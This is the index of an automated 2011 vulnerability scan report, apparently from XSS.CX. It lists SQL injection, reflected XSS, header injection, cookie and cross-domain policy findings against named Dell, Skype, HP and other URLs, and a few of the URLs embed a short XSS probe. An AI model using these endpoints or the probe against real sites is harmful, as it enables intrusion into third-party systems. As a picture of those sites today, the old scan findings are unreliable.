XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09052011-01

Report generated by XSS.CX at Mon Sep 05 07:56:49 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. SQL injection

1.1. http://accessories.us.dell.com/sna/productdetail.aspx [Referer HTTP header]

1.2. http://accessories.us.dell.com/sna/productdetail.aspx [name of an arbitrarily supplied request parameter]

1.3. http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456 [REST URL parameter 2]

1.4. http://community.skype.com/t5/Call-quality/Call-quality-Computer-speed-is-very-slow/m-p/133202 [Referer HTTP header]

1.5. http://community.skype.com/t5/English/ct-p/English [name of an arbitrarily supplied request parameter]

1.6. http://community.skype.com/t5/Pagamenti-Fatture-Crediti/bd-p/it_payment [name of an arbitrarily supplied request parameter]

1.7. http://community.skype.com/t5/Skype-Manager/bd-p/Skype_Manager [name of an arbitrarily supplied request parameter]

1.8. http://community.skype.com/t5/Skype-for-Business/bd-p/pt_business [REST URL parameter 3]

1.9. http://community.skype.com/t5/Skype-on-your-TV/bd-p/Skype_on_your_TV [User-Agent HTTP header]

1.10. http://community.skype.com/t5/Support-et-information/bd-p/fr_community [REST URL parameter 3]

1.11. http://community.skype.com/t5/Video/Screen-sharing-is-quot-grayed-out-quot/m-p/134058 [name of an arbitrarily supplied request parameter]

1.12. http://community.skype.com/t5/Welcome-Getting-Started/repeatedly-need-to-select-skype-to-start-it/m-p/134248 [User-Agent HTTP header]

1.13. http://community.skype.com/t5/Windows/Api-access-control-wont-remember/m-p/134242 [name of an arbitrarily supplied request parameter]

1.14. http://community.skype.com/t5/Windows/Disabling-Skype-Home-autostart/m-p/64492 [User-Agent HTTP header]

1.15. http://community.skype.com/t5/Windows/Error-in-quot-Add-a-contact-quot-dialog/m-p/129510 [User-Agent HTTP header]

1.16. http://community.skype.com/t5/Windows/Skype-Refuses-to-load-no-error-message-windows-7/td-p/26644 [Referer HTTP header]

1.17. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/25246/message-uid/25246/highlight/true [REST URL parameter 9]

1.18. http://community.skype.com/t5/forums/forumtopicprintpage/board-id/Windows/message-id/2921/print-single-message/true/page/1 [name of an arbitrarily supplied request parameter]

1.19. http://community.skype.com/t5/forums/recentpostspage/category-id/English/post-type/message [Referer HTTP header]

1.20. http://community.skype.com/t5/forums/recentpostspage/category-id/English/post-type/message [name of an arbitrarily supplied request parameter]

1.21. http://community.skype.com/t5/forums/recentpostspage/category-id/English/post-type/thread [REST URL parameter 4]

1.22. http://community.skype.com/t5/forums/searchpage/tab/message [User-Agent HTTP header]

1.23. http://community.skype.com/t5/help/faqpage/faq-category-id/advanced [REST URL parameter 4]

1.24. http://community.skype.com/t5/help/faqpage/faq-category-id/ideas [Referer HTTP header]

1.25. http://community.skype.com/t5/help/faqpage/faq-category-id/ideas [User-Agent HTTP header]

1.26. http://community.skype.com/t5/help/faqpage/faq-category-id/ideas [name of an arbitrarily supplied request parameter]

1.27. http://community.skype.com/t5/help/faqpage/faq-category-id/kudos [Referer HTTP header]

1.28. http://community.skype.com/t5/help/faqpage/faq-category-id/participation [REST URL parameter 5]

1.29. http://community.skype.com/t5/help/faqpage/faq-category-id/qa [Referer HTTP header]

1.30. http://community.skype.com/t5/help/faqpage/faq-category-id/qa [name of an arbitrarily supplied request parameter]

1.31. http://community.skype.com/t5/help/faqpage/faq-category-id/video [REST URL parameter 5]

1.32. http://community.skype.com/t5/iPad/Trouble-calling-nonskype-phones-from-iPad-and-iPhone/m-p/134130 [REST URL parameter 2]

1.33. http://community.skype.com/t5/iPad/Trouble-calling-nonskype-phones-from-iPad-and-iPhone/m-p/134130 [REST URL parameter 3]

1.34. http://community.skype.com/t5/iPhone/A-plan-for-calling-FROM-europe-to-USA/m-p/133998 [User-Agent HTTP header]

1.35. http://community.skype.com/t5/iPhone/bd-p/iPhone [name of an arbitrarily supplied request parameter]

1.36. http://community.skype.com/t5/notifications/notifymoderatorpage/message-uid/25246 [name of an arbitrarily supplied request parameter]

1.37. http://community.skype.com/t5/tag/Mac/tg-p/category-id/English [REST URL parameter 2]

1.38. http://community.skype.com/t5/tag/Subscription/tg-p/category-id/English [Referer HTTP header]

1.39. http://community.skype.com/t5/tag/Video/tg-p/category-id/English [name of an arbitrarily supplied request parameter]

1.40. http://community.skype.com/t5/tag/call/tg-p/category-id/English [name of an arbitrarily supplied request parameter]

1.41. http://community.skype.com/t5/tag/crash/tg-p/category-id/English [REST URL parameter 6]

1.42. http://community.skype.com/t5/tag/error/tg-p/category-id/English [name of an arbitrarily supplied request parameter]

1.43. http://community.skype.com/t5/tag/spanish/tg-p/category-id/English [Referer HTTP header]

1.44. http://community.skype.com/t5/user/viewprofilepage/user-id/165954 [User-Agent HTTP header]

1.45. http://community.skype.com/t5/user/viewprofilepage/user-id/165958 [REST URL parameter 3]

1.46. http://community.skype.com/t5/user/viewprofilepage/user-id/59914 [REST URL parameter 2]

1.47. http://community.skype.com/t5/user/viewprofilepage/user-id/8 [REST URL parameter 2]

1.48. http://community.skype.com/t5/util/componentrenderpage/component-id/ [name of an arbitrarily supplied request parameter]

1.49. http://search2.skype.com/search/search.cgi [name of an arbitrarily supplied request parameter]

2. HTTP header injection

2.1. http://142.xg4ken.com/media/redir.php [k_clickid parameter]

2.2. http://142.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

3. Cross-site scripting (reflected)

3.1. http://ad.turn.com/server/pixel.htm [fpid parameter]

3.2. http://afe.specificclick.net/ [name of an arbitrarily supplied request parameter]

3.3. http://afe.specificclick.net/ [pasmc parameter]

3.4. http://afe.specificclick.net/serve/v=5 [m parameter]

3.5. http://afe.specificclick.net/serve/v=5 [m parameter]

3.6. http://afe.specificclick.net/serve/v=5 [m parameter]

3.7. http://afe.specificclick.net/serve/v=5 [name of an arbitrarily supplied request parameter]

3.8. http://afe.specificclick.net/serve/v=5 [name of an arbitrarily supplied request parameter]

3.9. http://afe.specificclick.net/serve/v=5 [name of an arbitrarily supplied request parameter]

3.10. http://api.bizographics.com/v1/profile.json [&callback parameter]

3.11. http://api.bizographics.com/v1/profile.json [api_key parameter]

3.12. http://apps.sapha.com/appshandler.php [ac parameter]

3.13. http://content-cdn.dell.com/JS/default/jsStrings.ashx [st parameter]

3.14. http://dce.sapha.com/engine.php [ac parameter]

3.15. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/ajax [mbox parameter]

3.16. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/ajax [profile.catid parameter]

3.17. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/ajax [profile.pn parameter]

3.18. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/ajax [profile.pt parameter]

3.19. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/standard [mbox parameter]

3.20. http://ecustomeropinions.com/survey/survey.php [data1 parameter]

3.21. http://h20180.www2.hp.com/apps/Nav [name of an arbitrarily supplied request parameter]

3.22. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm [REST URL parameter 1]

3.23. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm [REST URL parameter 2]

3.24. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm [REST URL parameter 3]

3.25. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm [REST URL parameter 4]

3.26. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm [REST URL parameter 4]

3.27. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm [REST URL parameter 5]

3.28. http://h30187.www3.hp.com/howto_QL_courses.jsp [REST URL parameter 1]

3.29. http://h30187.www3.hp.com/index.jsp [REST URL parameter 1]

3.30. http://h30187.www3.hp.com/is/20e091670f/p/productId/104917/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

3.31. http://h30187.www3.hp.com/is/325ef8a67a/p/productId/104923/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

3.32. http://h30187.www3.hp.com/is/3acb9749b2/p/productId/104920/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

3.33. http://h30187.www3.hp.com/is/3b7457787c/p/productId/104931/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

3.34. http://h30187.www3.hp.com/is/47780c0137/p/productId/104922/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

3.35. http://h30187.www3.hp.com/is/8ba8b30c42/p/productId/104918/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

3.36. http://h30187.www3.hp.com/is/9ccd9cd181/p/productId/104924/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

3.37. http://h30187.www3.hp.com/is/a5588e763b/p/productId/104931/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

3.38. http://h30187.www3.hp.com/is/a5e43ec55d/p/productId/104921/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

3.39. http://h30187.www3.hp.com/is/b5c411ac2a/p/productId/104923/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

3.40. http://h30187.www3.hp.com/is/c584bdc88b/p/productId/104924/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

3.41. http://h30187.www3.hp.com/is/d08e5b9012/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif [REST URL parameter 1]

3.42. http://h30187.www3.hp.com/is/ec0a3f9959/p/productId/104920/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

3.43. http://h30187.www3.hp.com/is/f8069e08a0/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif [REST URL parameter 1]

3.44. http://h30187.www3.hp.com/pv.gif [REST URL parameter 1]

3.45. http://h30187.www3.hp.com/resources/scripts/builder.js [REST URL parameter 1]

3.46. http://h30187.www3.hp.com/resources/scripts/builder.js [REST URL parameter 2]

3.47. http://h30187.www3.hp.com/resources/scripts/builder.js [REST URL parameter 3]

3.48. http://h30187.www3.hp.com/resources/scripts/controls.js [REST URL parameter 1]

3.49. http://h30187.www3.hp.com/resources/scripts/controls.js [REST URL parameter 2]

3.50. http://h30187.www3.hp.com/resources/scripts/controls.js [REST URL parameter 3]

3.51. http://h30187.www3.hp.com/resources/scripts/coremetrics/cmdatatagutils.js [REST URL parameter 1]

3.52. http://h30187.www3.hp.com/resources/scripts/coremetrics/cmdatatagutils.js [REST URL parameter 2]

3.53. http://h30187.www3.hp.com/resources/scripts/coremetrics/cmdatatagutils.js [REST URL parameter 3]

3.54. http://h30187.www3.hp.com/resources/scripts/coremetrics/cmdatatagutils.js [REST URL parameter 4]

3.55. http://h30187.www3.hp.com/resources/scripts/coremetrics/v40/eluminate.js [REST URL parameter 1]

3.56. http://h30187.www3.hp.com/resources/scripts/coremetrics/v40/eluminate.js [REST URL parameter 2]

3.57. http://h30187.www3.hp.com/resources/scripts/coremetrics/v40/eluminate.js [REST URL parameter 3]

3.58. http://h30187.www3.hp.com/resources/scripts/coremetrics/v40/eluminate.js [REST URL parameter 4]

3.59. http://h30187.www3.hp.com/resources/scripts/coremetrics/v40/eluminate.js [REST URL parameter 5]

3.60. http://h30187.www3.hp.com/resources/scripts/dragdrop.js [REST URL parameter 1]

3.61. http://h30187.www3.hp.com/resources/scripts/dragdrop.js [REST URL parameter 2]

3.62. http://h30187.www3.hp.com/resources/scripts/dragdrop.js [REST URL parameter 3]

3.63. http://h30187.www3.hp.com/resources/scripts/effects.js [REST URL parameter 1]

3.64. http://h30187.www3.hp.com/resources/scripts/effects.js [REST URL parameter 2]

3.65. http://h30187.www3.hp.com/resources/scripts/effects.js [REST URL parameter 3]

3.66. http://h30187.www3.hp.com/resources/scripts/powered_utils.js [REST URL parameter 1]

3.67. http://h30187.www3.hp.com/resources/scripts/powered_utils.js [REST URL parameter 2]

3.68. http://h30187.www3.hp.com/resources/scripts/powered_utils.js [REST URL parameter 3]

3.69. http://h30187.www3.hp.com/resources/scripts/prototype.js [REST URL parameter 1]

3.70. http://h30187.www3.hp.com/resources/scripts/prototype.js [REST URL parameter 2]

3.71. http://h30187.www3.hp.com/resources/scripts/prototype.js [REST URL parameter 3]

3.72. http://h30187.www3.hp.com/resources/scripts/scriptaculous.js [REST URL parameter 1]

3.73. http://h30187.www3.hp.com/resources/scripts/scriptaculous.js [REST URL parameter 2]

3.74. http://h30187.www3.hp.com/resources/scripts/scriptaculous.js [REST URL parameter 3]

3.75. http://h30187.www3.hp.com/resources/scripts/slider.js [REST URL parameter 1]

3.76. http://h30187.www3.hp.com/resources/scripts/slider.js [REST URL parameter 2]

3.77. http://h30187.www3.hp.com/resources/scripts/slider.js [REST URL parameter 3]

3.78. http://h30187.www3.hp.com/resources/scripts/sound.js [REST URL parameter 1]

3.79. http://h30187.www3.hp.com/resources/scripts/sound.js [REST URL parameter 2]

3.80. http://h30187.www3.hp.com/resources/scripts/sound.js [REST URL parameter 3]

3.81. http://h30187.www3.hp.com/resources/scripts/swfobject.js [REST URL parameter 1]

3.82. http://h30187.www3.hp.com/resources/scripts/swfobject.js [REST URL parameter 2]

3.83. http://h30187.www3.hp.com/resources/scripts/swfobject.js [REST URL parameter 3]

3.84. http://h30187.www3.hp.com/resources/scripts/widget/loader.js [REST URL parameter 1]

3.85. http://h30187.www3.hp.com/resources/scripts/widget/loader.js [REST URL parameter 2]

3.86. http://h30187.www3.hp.com/resources/scripts/widget/loader.js [REST URL parameter 3]

3.87. http://h30187.www3.hp.com/resources/scripts/widget/loader.js [REST URL parameter 4]

3.88. http://h30187.www3.hp.com/resources/scripts/widget/util.js [REST URL parameter 1]

3.89. http://h30187.www3.hp.com/resources/scripts/widget/util.js [REST URL parameter 2]

3.90. http://h30187.www3.hp.com/resources/scripts/widget/util.js [REST URL parameter 3]

3.91. http://h30187.www3.hp.com/resources/scripts/widget/util.js [REST URL parameter 4]

3.92. http://h30187.www3.hp.com/resources/stylesheets/site.jsp [REST URL parameter 1]

3.93. http://h30187.www3.hp.com/resources/stylesheets/site.jsp [REST URL parameter 2]

3.94. http://h30187.www3.hp.com/resources/stylesheets/site.jsp [REST URL parameter 3]

3.95. https://h41183.www4.hp.com/inflexion/ [jumpid parameter]

3.96. http://js.revsci.net/gateway/gw.js [csid parameter]

3.97. http://lwn.net/Articles/456878/ [REST URL parameter 1]

3.98. http://lwn.net/Articles/456878/ [REST URL parameter 2]

3.99. http://lwn.net/Articles/456878/ [name of an arbitrarily supplied request parameter]

3.100. http://lwn.net/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E [REST URL parameter 1]

3.101. http://lwn.net/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E [REST URL parameter 2]

3.102. http://lwn.net/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E [REST URL parameter 3]

3.103. http://lwn.net/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E [format parameter]

3.104. http://lwn.net/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E [name of an arbitrarily supplied request parameter]

3.105. http://pixel.adsafeprotected.com/jspix [anId parameter]

3.106. http://pixel.adsafeprotected.com/jspix [campId parameter]

3.107. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]

3.108. http://pixel.adsafeprotected.com/jspix [pubId parameter]

3.109. https://support.skype.com/en-us/glossary [name of an arbitrarily supplied request parameter]

3.110. https://support.skype.com/en-us/search.form [name of an arbitrarily supplied request parameter]

3.111. https://support.skype.com/en-us/search_first/ [name of an arbitrarily supplied request parameter]

3.112. https://support.skype.com/en/faqFeedback.form [name of an arbitrarily supplied request parameter]

3.113. https://support.skype.com/en/glossary [name of an arbitrarily supplied request parameter]

3.114. https://support.skype.com/en/search [name of an arbitrarily supplied request parameter]

3.115. https://support.skype.com/en/search [q parameter]

3.116. https://support.skype.com/en/search.form [name of an arbitrarily supplied request parameter]

3.117. https://support.skype.com/en/support_selection_after_search [name of an arbitrarily supplied request parameter]

3.118. https://support.skype.com/en/tips [name of an arbitrarily supplied request parameter]

3.119. http://trk.etrigue.com/track.php [a parameter]

3.120. http://www.lijit.com/delivery/fp [n parameter]

3.121. http://www.linkedin.com/countserv/count/share [url parameter]

3.122. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]

3.123. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]

3.124. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [t parameter]

3.125. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [zimg parameter]

3.126. http://www.w3schools.com/js/tryit_view.asp [code parameter]

3.127. http://www.w3schools.com/jsref/tryit_view.asp [code parameter]

3.128. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

3.129. https://mpsnare.iesnare.com/snare.js [User-Agent HTTP header]

3.130. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]

3.131. http://apps.sapha.com/appshandler.php [sapha_2522_1 cookie]

3.132. http://ecustomeropinions.com/survey/survey.php [server cookie]

3.133. http://ecustomeropinions.com/survey/survey.php [server cookie]

3.134. https://h30046.www3.hp.com/ [name of an arbitrarily supplied request parameter]

3.135. https://h30046.www3.hp.com/ [name of an arbitrarily supplied request parameter]

4. Flash cross-domain policy

4.1. http://142.xg4ken.com/crossdomain.xml

4.2. http://ad.turn.com/crossdomain.xml

4.3. http://afe.specificclick.net/crossdomain.xml

4.4. http://ajax.googleapis.com/crossdomain.xml

4.5. http://altfarm.mediaplex.com/crossdomain.xml

4.6. http://apps.sapha.com/crossdomain.xml

4.7. http://apr.lijit.com/crossdomain.xml

4.8. http://cache.specificmedia.com/crossdomain.xml

4.9. http://cdn.turn.com/crossdomain.xml

4.10. http://ce.lijit.com/crossdomain.xml

4.11. http://dellinc.tt.omtrdc.net/crossdomain.xml

4.12. http://eas.apm.emediate.eu/crossdomain.xml

4.13. http://fls.doubleclick.net/crossdomain.xml

4.14. https://fls.doubleclick.net/crossdomain.xml

4.15. http://gacela.eu/crossdomain.xml

4.16. http://h41174.www4.hp.com/crossdomain.xml

4.17. http://ib.adnxs.com/crossdomain.xml

4.18. http://img-cdn.mediaplex.com/crossdomain.xml

4.19. http://m.webtrends.com/crossdomain.xml

4.20. http://media.fastclick.net/crossdomain.xml

4.21. http://met1.hp.com/crossdomain.xml

4.22. http://metrics.skype.com/crossdomain.xml

4.23. http://microsoftsto.112.2o7.net/crossdomain.xml

4.24. http://now.eloqua.com/crossdomain.xml

4.25. http://nsm.dell.com/crossdomain.xml

4.26. http://pixel.33across.com/crossdomain.xml

4.27. http://pixel.adsafeprotected.com/crossdomain.xml

4.28. http://pixel.mathtag.com/crossdomain.xml

4.29. http://pixel.quantserve.com/crossdomain.xml

4.30. http://r.turn.com/crossdomain.xml

4.31. http://statse.webtrendslive.com/crossdomain.xml

4.32. http://sync.mathtag.com/crossdomain.xml

4.33. http://tags.bluekai.com/crossdomain.xml

4.34. http://vap1den1.lijit.com/crossdomain.xml

4.35. http://vap1iad1.lijit.com/crossdomain.xml

4.36. http://vap1iad2.lijit.com/crossdomain.xml

4.37. http://vap1sfo1.lijit.com/crossdomain.xml

4.38. http://vap2den1.lijit.com/crossdomain.xml

4.39. http://vap2iad1.lijit.com/crossdomain.xml

4.40. http://vap3den1.lijit.com/crossdomain.xml

4.41. http://www.cymphonix.com/crossdomain.xml

4.42. http://www.xg4ken.com/crossdomain.xml

4.43. http://accessories.us.dell.com/crossdomain.xml

4.44. https://adwords.google.com/crossdomain.xml

4.45. http://blogs.skype.com/crossdomain.xml

4.46. http://content-cdn.dell.com/crossdomain.xml

4.47. http://content.dell.com/crossdomain.xml

4.48. http://disqus.com/crossdomain.xml

4.49. http://embed.technorati.com/crossdomain.xml

4.50. http://h30415.www3.hp.com/crossdomain.xml

4.51. http://h30507.www3.hp.com/crossdomain.xml

4.52. http://h41131.www4.hp.com/crossdomain.xml

4.53. http://i.dell.com/crossdomain.xml

4.54. http://lt.dell.com/crossdomain.xml

4.55. http://pagead2.googlesyndication.com/crossdomain.xml

4.56. https://secure.skypeassets.com/crossdomain.xml

4.57. http://share.skype.com/crossdomain.xml

4.58. http://shop.skype.com/crossdomain.xml

4.59. http://www-cdn.dell.com/crossdomain.xml

4.60. http://www.hp.com/crossdomain.xml

4.61. http://www.ibm.com/crossdomain.xml

4.62. http://www.radware.com/crossdomain.xml

4.63. http://www.skype.com/crossdomain.xml

4.64. http://www.skypeassets.com/crossdomain.xml

4.65. http://www.typepad.com/crossdomain.xml

4.66. http://bit.ly/crossdomain.xml

4.67. http://cymphonix.app3.hubspot.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://met1.hp.com/clientaccesspolicy.xml

5.2. http://metrics.skype.com/clientaccesspolicy.xml

5.3. http://microsoftsto.112.2o7.net/clientaccesspolicy.xml

5.4. http://nsm.dell.com/clientaccesspolicy.xml

5.5. http://pixel.33across.com/clientaccesspolicy.xml

5.6. http://pixel.quantserve.com/clientaccesspolicy.xml

5.7. http://js.microsoft.com/clientaccesspolicy.xml

5.8. http://msdn.microsoft.com/clientaccesspolicy.xml

6. Cleartext submission of password

6.1. http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html

6.2. http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html

7. SSL cookie without secure flag set

7.1. https://login.skype.com/account/password-reset-request

7.2. https://login.skype.com/password-reset-request

7.3. https://secure.skype.com/account/buy/package

7.4. https://secure.skype.com/account/login

7.5. https://support.skype.com/

7.6. https://adwords.google.com/um/StartNewLogin

7.7. https://developer.skype.com/

7.8. https://developer.skype.com/accessories

7.9. https://developer.skype.com/camera/skype-uvc-extension-unit-specification

7.10. https://developer.skype.com/certification

7.11. https://developer.skype.com/certification/accessories

7.12. https://developer.skype.com/certification/certified-list

7.13. https://developer.skype.com/certification/odm-program

7.14. https://developer.skype.com/images/skype/bgHeaderDashboard.jpg

7.15. https://developer.skype.com/login

7.16. https://developer.skype.com/public/skypekit

7.17. https://developer.skype.com/public/skypekit/

7.18. https://developer.skype.com/resources/logoSkypeDeveloper.gif

7.19. https://developer.skype.com/signup

7.20. https://developer.skype.com/silk

7.21. https://developer.skype.com/skypekit

7.22. https://developer.skype.com/stylesheets/templates/main.css

7.23. https://developer.skype.com/stylesheets/templates/reset.css

7.24. https://developer.skype.com/support

7.25. https://developer.skype.com/support/

7.26. https://h30046.www3.hp.com/subchoice/country/us/en/subhub.aspx

7.27. https://login.skype.com/account/

7.28. https://login.skype.com/account/login-form

7.29. https://login.skype.com/account/password-automation

7.30. https://login.skype.com/account/password-token-sent

7.31. https://login.skype.com/account/signup-form

7.32. https://login.skype.com/go/shop

7.33. https://login.skype.com/go/shop.accessories.headsets

7.34. https://login.skype.com/go/shop.accessories.phones

7.35. https://login.skype.com/go/shop.accessories.webcams

7.36. https://login.skype.com/go/shop.extras

7.37. https://login.skype.com/go/skype.manager.setup

7.38. https://login.skype.com/go/tvwebcams

7.39. https://mid.live.com/si/login.aspx/x22

7.40. https://mid.live.com/si/login.aspx/x3c/cite/x3e/x3cspan

7.41. https://secure.skype.com/login

8. Session token in URL

8.1. http://blogs.skype.com/en/2010/06/

8.2. http://blogs.skype.com/en/campaigns_and_promotions/

8.3. http://blogs.skype.com/en/subscriptions/

8.4. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/ajax

8.5. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/standard

8.6. http://ecustomeropinions.com/survey/survey.php

8.7. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm

8.8. http://h30187.www3.hp.com/howto_QL_courses.jsp

8.9. http://h30187.www3.hp.com/is/20e091670f/p/productId/104917/eventType/PDV/puid/999999b/i.gif

8.10. http://h30187.www3.hp.com/is/325ef8a67a/p/productId/104923/eventType/PDV/puid/999999b/i.gif

8.11. http://h30187.www3.hp.com/is/3acb9749b2/p/productId/104920/eventType/PDV/puid/999999b/i.gif

8.12. http://h30187.www3.hp.com/is/3b7457787c/p/productId/104931/eventType/PDV/puid/999999b/i.gif

8.13. http://h30187.www3.hp.com/is/47780c0137/p/productId/104922/eventType/PDV/puid/999999b/i.gif

8.14. http://h30187.www3.hp.com/is/8ba8b30c42/p/productId/104918/eventType/PDV/puid/999999b/i.gif

8.15. http://h30187.www3.hp.com/is/9ccd9cd181/p/productId/104924/eventType/PDV/puid/999999b/i.gif

8.16. http://h30187.www3.hp.com/is/a5588e763b/p/productId/104931/eventType/PDV/puid/999999b/i.gif

8.17. http://h30187.www3.hp.com/is/a5e43ec55d/p/productId/104921/eventType/PDV/puid/999999b/i.gif

8.18. http://h30187.www3.hp.com/is/b5c411ac2a/p/productId/104923/eventType/PDV/puid/999999b/i.gif

8.19. http://h30187.www3.hp.com/is/c584bdc88b/p/productId/104924/eventType/PDV/puid/999999b/i.gif

8.20. http://h30187.www3.hp.com/is/d08e5b9012/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif

8.21. http://h30187.www3.hp.com/is/ec0a3f9959/p/productId/104920/eventType/PDV/puid/999999b/i.gif

8.22. http://h30187.www3.hp.com/is/f8069e08a0/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif

8.23. http://www.facebook.com/extern/login_status.php

8.24. http://www.skype.com/intl/en-us/prices/premium

8.25. http://www.skype.com/intl/en-us/prices/premium/

9. SSL certificate

9.1. https://apps.skypeassets.com/

9.2. https://blogs.skype.com/

9.3. https://chat1.us.dell.com/

9.4. https://h10078.www1.hp.com/

9.5. https://h30046.www3.hp.com/

9.6. https://h41183.www4.hp.com/

9.7. https://mpsnare.iesnare.com/

9.8. https://skypecasts.skype.com/

9.9. https://www.trustwave.com/

9.10. https://adwords.google.com/

9.11. https://connect.facebook.net/

9.12. https://developer.skype.com/

9.13. https://fls.doubleclick.net/

9.14. https://login.barracuda.com/

9.15. https://login.skype.com/

9.16. https://mid.live.com/

9.17. https://secure.skype.com/

9.18. https://secure.skypeassets.com/

9.19. https://support.skype.com/

10. Cookie scoped to parent domain

10.1. https://login.skype.com/account/password-reset-request

10.2. https://login.skype.com/password-reset-request

10.3. https://mpsnare.iesnare.com/snare.js

10.4. http://msite.martiniadnetwork.com/index/

10.5. https://secure.skype.com/account/buy/package

10.6. https://secure.skype.com/account/login

10.7. http://www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps

10.8. http://142.xg4ken.com/media/redir.php

10.9. http://accessories.us.dell.com/sna/DellPartsFamily.aspx

10.10. http://accessories.us.dell.com/sna/ShopAllBrands.aspx

10.11. http://accessories.us.dell.com/sna/batteryconfig.aspx

10.12. http://accessories.us.dell.com/sna/category.aspx

10.13. http://accessories.us.dell.com/sna/category.aspx

10.14. http://accessories.us.dell.com/sna/default.aspx

10.15. http://accessories.us.dell.com/sna/memconfig.aspx

10.16. http://accessories.us.dell.com/sna/printersupplies.aspx

10.17. http://accessories.us.dell.com/sna/productdetail.aspx

10.18. http://accessories.us.dell.com/sna/sna.aspx

10.19. http://apr.lijit.com///www/delivery/ajs.php

10.20. http://b.scorecardresearch.com/b

10.21. http://b.scorecardresearch.com/p

10.22. http://b.scorecardresearch.com/r

10.23. http://ce.lijit.com/merge

10.24. http://community.skype.com/t5/Android%27/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456

10.25. http://community.skype.com/t5/English/ct-p/English

10.26. http://community.skype.com/t5/image/serverpage/image-id/60iD23BC4754E7B32F3/image-dimensions/64x36

10.27. http://content.dell.com/us/en/business/security-network.aspx

10.28. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/6981940571811189480/mchpid/2/url/

10.29. http://dce.sapha.com/logging.php

10.30. http://h30434.www3.hp.com/

10.31. http://ib.adnxs.com/mapuid

10.32. http://id.google.com/verify/EAAAABu2UstRRffrSR7oBrVqvsg.gif

10.33. http://id.google.com/verify/EAAAAD62iUELm6gGoNz_95wbJa0.gif

10.34. http://id.google.com/verify/EAAAADICz-2SCXX7DbRNblZyv5k.gif

10.35. https://login.skype.com/account/

10.36. https://login.skype.com/account/login-form

10.37. https://login.skype.com/account/password-automation

10.38. https://login.skype.com/account/password-token-sent

10.39. https://login.skype.com/account/signup-form

10.40. https://login.skype.com/go/shop

10.41. https://login.skype.com/go/shop.accessories.headsets

10.42. https://login.skype.com/go/shop.accessories.phones

10.43. https://login.skype.com/go/shop.accessories.webcams

10.44. https://login.skype.com/go/shop.extras

10.45. https://login.skype.com/go/skype.manager.setup

10.46. https://login.skype.com/go/tvwebcams

10.47. http://media.fastclick.net/w/tre

10.48. http://metrics.skype.com/b/ss/skypeallprod/1/H.17/s33706402148852

10.49. http://pixel.33across.com/ps/

10.50. http://pixel.quantserve.com/pixel/p-46B_c711bvEMM.gif

10.51. http://pixel.quantserve.com/pixel/p-56WJ0KtIxWJ_2.gif

10.52. http://r.turn.com/r/beacon

10.53. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8y/rnd/149046210

10.54. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8y/rnd/1662255836

10.55. http://search.dell.com/public/css.aspx

10.56. http://search.dell.com/public/menu.aspx

10.57. http://search.dell.com/results.aspx

10.58. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/bike/avatar-theme/candy/avatar-collection/transit/avatar-display-size/message

10.59. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/camera/avatar-theme/candy/avatar-collection/tech/avatar-display-size/message

10.60. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/dog/avatar-theme/candy/avatar-collection/animals/avatar-display-size/message

